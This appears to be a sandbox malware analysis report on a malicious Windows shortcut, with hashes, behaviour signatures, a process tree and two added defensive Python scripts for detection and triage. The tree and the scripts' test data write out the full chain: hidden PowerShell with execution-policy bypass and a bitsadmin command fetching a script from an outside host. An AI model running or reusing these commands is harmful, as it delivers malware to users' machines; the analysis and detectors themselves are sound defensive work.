Analysis
max time kernel: 117s
max time network: 118s
platform: windows7_x64
resource: win7-20240708-en
resource tags: arch:x64, arch:x86, image:win7-20240708-en, locale:en-us, os:windows7-x64, system
submitted: 25-08-2024 19:01
Static task: static1
Behavioral task: behavioral1
Sample: pack-KRJ88981-99192.lnk
Resource: win7-20240708-en
General
Target: pack-KRJ88981-99192.lnk
Size: 2KB
MD5: 4163cb3655dfdae03d13d623dd9dc8db
SHA1: 6183474325319e89dcf02e9bd54220d1d912638b
SHA256: 0984a28618d50bee71deec7824b449bbe04b04b0951fe4d8dcf8a3ffa7691bb7
SHA512: b5205aa5686fed2f93edcd42729fad49572fe3424459d93c32139460bf3d06ee4d18d2391800965d97129e1f39c932409f1b58388bc70841624c4f11718c8a8d
Malware Config
Signatures
- Command and Scripting Interpreter: PowerShell (1 TTP, 1 IoC)
  Runs PowerShell with the display window hidden.
- Download via BitsAdmin (1 TTP, 1 IoC)
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Suspicious behavior: EnumeratesProcesses (3 IoCs)
  Processes:
    PID   process
    2796  powershell.exe   (reported three times)
- Suspicious use of AdjustPrivilegeToken (1 IoC)
  Processes:
    description              PID   process
    Token: SeDebugPrivilege  2796  powershell.exe
- Suspicious use of WriteProcessMemory (18 IoCs)
  Processes: cmd.exe, cmd.exe, cmd.exe, powershell.exe, cmd.exe
    PID   process         target PID  target process
    2156  cmd.exe         780         cmd.exe
    780   cmd.exe         2960        findstr.exe
    780   cmd.exe         2756        cmd.exe
    2756  cmd.exe         2796        powershell.exe
    2796  powershell.exe  2632        cmd.exe
    2632  cmd.exe         2776        bitsadmin.exe
  Each of the six parent-to-child writes is reported three times, which is where the count of 18 comes from.
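The WriteProcessMemory signature above is really a parent/child chain: cmd.exe (the .lnk launch) spawns a cmd.exe that runs findstr and a second cmd.exe, which starts the hidden PowerShell, which starts cmd.exe, which starts bitsadmin.exe. No single hop is conclusive on its own, so the detector below scores the whole ancestry of each process instead of individual command lines. This is an added example, not part of the sandbox report or its vendor's rules; the event tuples are constructed from the PIDs and command lines in this report (the root parent PID 1000 and the benign dir command are invented for the test), and the (pid, ppid, image, cmdline) layout is an assumption rather than any EDR's schema.

```python
"""Flag the LNK -> findstr -> hidden PowerShell -> bitsadmin chain in process telemetry.

Added example, not part of the sandbox report. EVENTS is constructed from the
parent/child relationships and command lines the report lists; the
(pid, ppid, image, cmdline) layout is an assumption, not any EDR's real schema.
"""
import re

# Constructed process-creation events mirroring the report, plus one benign
# cmd.exe the scorer must not flag. Parent PID 1000 is assumed.
EVENTS = [
    (2156, 1000, r"C:\Windows\system32\cmd.exe",
     r"cmd /c C:\Users\Admin\AppData\Local\Temp\pack-KRJ88981-99192.lnk"),
    (780, 2156, r"C:\Windows\System32\cmd.exe",
     r'"C:\Windows\System32\cmd.exe" /c findstr /s jhdfkweinwefa C:\Users\Admin\*.lnk'
     r' > C:\Users\Admin\Documents\blue.ps1'
     r' & cmd /c powershell -w hidden -ep bypass -File C:\Users\Admin\Documents\blue.ps1'),
    (2960, 780, r"C:\Windows\system32\findstr.exe",
     r"findstr /s jhdfkweinwefa C:\Users\Admin\*.lnk"),
    (2756, 780, r"C:\Windows\system32\cmd.exe",
     r"cmd /c powershell -w hidden -ep bypass -File C:\Users\Admin\Documents\blue.ps1"),
    (2796, 2756, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r"powershell -w hidden -ep bypass -File C:\Users\Admin\Documents\blue.ps1"),
    (2632, 2796, r"C:\Windows\system32\cmd.exe",
     r'"C:\Windows\system32\cmd.exe" /C echo 1 > C:\Users\Admin\AppData\Roaming\d'
     r' & bitsadmin /transfer jhdfkweinwefa /download /priority FOREGROUND'
     r' "https://jotaortega.com/white/tino.ps1" C:\Users\Admin\AppData\Roaming\ilxmNkDcyfpSBn.ps1'
     r' & del C:\Users\Admin\AppData\Roaming\d & exit'),
    (2776, 2632, r"C:\Windows\system32\bitsadmin.exe",
     r'bitsadmin /transfer jhdfkweinwefa /download /priority FOREGROUND'
     r' "https://jotaortega.com/white/tino.ps1" C:\Users\Admin\AppData\Roaming\ilxmNkDcyfpSBn.ps1'),
    (3100, 1000, r"C:\Windows\system32\cmd.exe", r"cmd /c dir C:\Users\Admin\Documents"),
]

RULES = {
    # a .lnk appears on the command line (launched directly or globbed over)
    "lnk_in_cmdline": re.compile(r"\.lnk\b", re.I),
    # findstr output redirected into a .ps1: the carve step
    "findstr_to_ps1": re.compile(r"\bfindstr\b.*>\s*\S+\.ps1\b", re.I),
    # powershell started with a hidden window and the execution policy bypassed
    "hidden_powershell": re.compile(
        r"\bpowershell\b(?=.*-w(?:indowstyle)?\s+hidden)(?=.*-e(?:p|xecutionpolicy)\s+bypass)", re.I),
    # BITS used as the downloader
    "bitsadmin_download": re.compile(r"\bbitsadmin\b.*/transfer\b.*https?://", re.I),
}


def match_rules(cmdline):
    """Names of the rules that fire on one command line."""
    return {name for name, rx in RULES.items() if rx.search(cmdline)}


def lineage(by_pid, pid):
    """The process plus every recorded ancestor, child first; stops at unknown or looping PIDs."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid])
        pid = by_pid[pid][1]
    return chain


def score_lineage(events, pid, min_rules=2):
    """Sorted rule names firing anywhere in pid's ancestry; empty unless min_rules distinct rules fire.

    Scoring the lineage is what ties the pieces together: a lone findstr child
    or a lone BITS job is ordinary, but a bitsadmin whose ancestors include a
    hidden PowerShell and a cmd that carved a .ps1 out of .lnk files is this chain.
    """
    by_pid = {e[0]: e for e in events}
    hits = set()
    for _, _, _, cmdline in lineage(by_pid, pid):
        hits |= match_rules(cmdline)
    return sorted(hits) if len(hits) >= min_rules else []


def find_suspicious(events, min_rules=2):
    """Map each PID whose ancestry trips at least min_rules rules to the rule names."""
    result = {}
    for pid, *_ in events:
        hits = score_lineage(events, pid, min_rules)
        if hits:
            result[pid] = hits
    return result


if __name__ == "__main__":
    for pid, hits in find_suspicious(EVENTS).items():
        print(pid, ", ".join(hits))
```

With min_rules=2 the sandbox's own launcher cmd.exe (only the .lnk rule fires) and the benign dir command stay quiet, while every process from PID 780 downward is flagged, the bitsadmin leaf with all four rules.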
Processes
1. C:\Windows\system32\cmd.exe (PID 2156)
   cmd /c C:\Users\Admin\AppData\Local\Temp\pack-KRJ88981-99192.lnk
   - Suspicious use of WriteProcessMemory
   2. C:\Windows\System32\cmd.exe (PID 780)
      "C:\Windows\System32\cmd.exe" /c findstr /s jhdfkweinwefa C:\Users\Admin\\*.lnk > C:\Users\Admin\\Documents\\blue.ps1 & cmd /c powershell -w hidden -ep bypass -File C:\Users\Admin\\Documents\\blue.ps1
      - Suspicious use of WriteProcessMemory
      3. C:\Windows\system32\findstr.exe (PID 2960)
         findstr /s jhdfkweinwefa C:\Users\Admin\\*.lnk
      3. C:\Windows\system32\cmd.exe (PID 2756)
         cmd /c powershell -w hidden -ep bypass -File C:\Users\Admin\\Documents\\blue.ps1
         - Suspicious use of WriteProcessMemory
         4. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2796)
            powershell -w hidden -ep bypass -File C:\Users\Admin\\Documents\\blue.ps1
            - Command and Scripting Interpreter: PowerShell
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            - Suspicious use of WriteProcessMemory
            5. C:\Windows\system32\cmd.exe (PID 2632)
               "C:\Windows\system32\cmd.exe" /C echo 1 > C:\Users\Admin\AppData\Roaming\\d & bitsadmin /transfer jhdfkweinwefa /download /priority FOREGROUND "https://jotaortega.com/white/tino.ps1" C:\Users\Admin\AppData\Roaming\\ilxmNkDcyfpSBn.ps1 & del C:\Users\Admin\AppData\Roaming\\d & exit
               - Suspicious use of WriteProcessMemory
               6. C:\Windows\system32\bitsadmin.exe (PID 2776)
                  bitsadmin /transfer jhdfkweinwefa /download /priority FOREGROUND "https://jotaortega.com/white/tino.ps1" C:\Users\Admin\AppData\Roaming\\ilxmNkDcyfpSBn.ps1
                  - Download via BitsAdmin
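The first real step in the tree is `findstr /s jhdfkweinwefa C:\Users\Admin\*.lnk > blue.ps1`: findstr is line-oriented and searches binary files too, so any text line inside the .lnk that contains the marker is written out as a script. The marker is also the BITS job name in the stage-5 command, so a line carrying that bitsadmin command selects itself. The triage script below is an added example, not part of the report: it checks the fixed ShellLink header, reproduces the findstr carve on a constructed .lnk-like byte string, and flags script-looking lines for hunting across a profile the way `findstr /s` walked it. SAMPLE_LNK and its payload line are constructed for illustration (the payload reuses the stage-5 command line from the tree); the real sample's bytes are not reproduced here.

```python
"""Carve a text payload out of a .lnk the way `findstr /s <marker> *.lnk > blue.ps1` does.

Added example, not from the sandbox report. The chain only works if the .lnk
carries text lines containing the marker, so this script (1) checks the
ShellLink header, (2) reproduces the findstr carve on a constructed .lnk-like
byte string, and (3) flags script-looking lines for hunting. SAMPLE_LNK and
PAYLOAD_LINE are constructed; the real sample's bytes are not reproduced.
"""
import re
from pathlib import Path

HEADER_SIZE = 0x4C
# MS-SHLLINK: HeaderSize 0x4C followed by CLSID 00021401-0000-0000-C000-000000000046
SHELL_LINK_MAGIC = bytes.fromhex("4c000000" "0114020000000000c000000000000046")

# Constructed payload: the stage-5 command from the report, as one CRLF-terminated
# line. The marker jhdfkweinwefa is the BITS job name, so this line matches itself.
PAYLOAD_LINE = (
    b'cmd /C echo 1 > C:\\Users\\Admin\\AppData\\Roaming\\d & bitsadmin /transfer jhdfkweinwefa'
    b' /download /priority FOREGROUND "https://jotaortega.com/white/tino.ps1"'
    b' C:\\Users\\Admin\\AppData\\Roaming\\ilxmNkDcyfpSBn.ps1 & del C:\\Users\\Admin\\AppData\\Roaming\\d & exit'
)
# Constructed .lnk-like blob: minimal header, some path residue as a real link body
# would contain, then the payload line appended after the binary part.
SAMPLE_LNK = (
    SHELL_LINK_MAGIC + bytes(HEADER_SIZE - len(SHELL_LINK_MAGIC))
    + b"\x00\x10\x00\x00C:\\Windows\\System32\\cmd.exe\x00" + bytes(40)
    + b"\r\n" + PAYLOAD_LINE + b"\r\n"
)

# LOLBins and PowerShell idioms worth surfacing even when the marker is unknown.
SCRIPT_HINTS = re.compile(
    rb"(?i)\b(powershell|bitsadmin|certutil|mshta|rundll32|invoke-expression|iex|downloadstring)\b")


def is_shell_link(data):
    """True if data starts with the fixed ShellLink header (HeaderSize + CLSID)."""
    return len(data) >= HEADER_SIZE and data[:len(SHELL_LINK_MAGIC)] == SHELL_LINK_MAGIC


def carve_lines(data, marker):
    """What findstr writes for this file: every newline-delimited line containing marker."""
    needle = marker.encode()
    return [raw.rstrip(b"\r").decode("latin-1")
            for raw in data.split(b"\n") if needle in raw]


def script_lines(data):
    """(offset, line) for lines that look like LOLBin or script commands, marker or not."""
    hits, pos = [], 0
    for raw in data.split(b"\n"):
        if SCRIPT_HINTS.search(raw):
            hits.append((pos, raw.rstrip(b"\r").decode("latin-1", "replace")))
        pos += len(raw) + 1  # account for the stripped newline
    return hits


def scan_tree(root, marker=None):
    """Hunt across a directory tree like findstr /s did, read-only, keyed by path."""
    findings = {}
    for path in Path(root).rglob("*.lnk"):
        data = path.read_bytes()
        lines = carve_lines(data, marker) if marker else [line for _, line in script_lines(data)]
        if lines:
            findings[str(path)] = (is_shell_link(data), lines)
    return findings


if __name__ == "__main__":
    print("ShellLink header:", is_shell_link(SAMPLE_LNK))
    for line in carve_lines(SAMPLE_LNK, "jhdfkweinwefa"):
        print("carved:", line)
    for off, line in script_lines(SAMPLE_LNK):
        print(f"script-like text at offset {off}: {line[:60]}...")
```

Run `scan_tree(r"C:\Users")` without a marker on a suspect host to find .lnk files whose tail contains command text regardless of which marker string the lure used; a normal shortcut has no such lines after its header.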
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 941B
MD5: 367a305a4630d346d724dbb691efb600
SHA1: d6c8eaad2c33dc6c1e6a78bcce5be7f1c6d31ecd
SHA256: eb806b5998540137f2d368ba7bd613d5cadf65c683467c0be55f8f4c2cd3caea
SHA512: 9484ee11a52aa8f26c85e94ebd326a75df52d33186ecbcfa118895ec39b5a1a9ede48ddabdae830294596ee9bd4827bb56c04b01e54ae6dd341ed10db2b61b11